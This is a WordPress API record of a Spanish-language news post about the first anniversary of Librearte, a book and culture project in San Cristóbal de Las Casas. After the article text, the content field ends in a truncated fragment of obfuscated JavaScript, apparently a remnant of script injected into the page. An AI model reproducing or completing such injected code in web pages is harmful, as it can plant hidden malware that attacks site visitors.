{"id":3388,"date":"2022-07-02T03:56:39","date_gmt":"2022-07-02T03:56:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3388"},"modified":"2022-07-02T03:56:40","modified_gmt":"2022-07-02T03:56:40","slug":"proyecto-editorial-independiente-celebrara-aniversario","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3388","title":{"rendered":"Proyecto editorial independiente celebrar\u00e1 aniversario"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-3389\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-06-30-at-3.39.57-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.- Este 2 de julio cumple su primer aniversario Librearte, por lo que en el Centro Cultural del Carmen, a cargo de Carolina Ben\u00edtez, realizar\u00e1 una serie de actividades que contempla talleres, m\u00fasica y la presentaci\u00f3n de un libro. En entrevista, coment\u00f3 que dentro del Jard\u00edn del Arte que celebran cada s\u00e1bado se celebrar\u00e1 este primer aniversario de este proyecto editorial que se dedica a la venta de libros usados principalmente, pero tambi\u00e9n es un espacio donde tienen diferentes actividades culturales y art\u00edsticas. \u201cA la cabeza se encuentra Margarito P\u00e9rez, Teresa Hern\u00e1ndez, Gabriel Mayorga, el programa es bastante nutrido, diverso, vamos a tener teatro, t\u00edteres, m\u00fasica, tambi\u00e9n la presentaci\u00f3n del n\u00famero 4 de la Revista Azogues, va ser un buen momento para conocer a fondo varios proyectos\u201d. Asimismo, dijo que dentro del Jard\u00edn del Arte van a instaurar los S\u00e1bados de Concierto, en punto de las 12 del d\u00eda \u201chabr\u00e1n propuestas musicales, la entrada ser\u00e1 gratuita; hay una propuesta interesante por parte de Jorge G\u00f3mez maestro del Centro Cultural y este s\u00e1bado iniciamos\u201d. \u201cCada s\u00e1bado a las 12 del d\u00eda tendremos un grupo de m\u00fasica local. Vamos a tener solistas, d\u00faos, tr\u00edos y ensambles musicales, queremos hacer un espacio de difusi\u00f3n de la m\u00fasica local, va ser un referente de propuestas musicales, vamos a dar a conocer un canal de comunicaci\u00f3n para recibir propuestas en redes sociales\u201d, concluy\u00f3. <\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.- Este 2 de julio cumple su primer aniversario Librearte, por lo que en el Centro Cultural del Carmen, a cargo de Carolina Ben\u00edtez, realizar\u00e1 una serie de actividades que contempla talleres, m\u00fasica y la presentaci\u00f3n de un libro. En entrevista, coment\u00f3 que dentro del Jard\u00edn del Arte que celebran &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3389,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3388","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3388"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3388\/revisions"}],"predecessor-version":[{"id":3390,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3388\/revisions\/3390"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3389"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}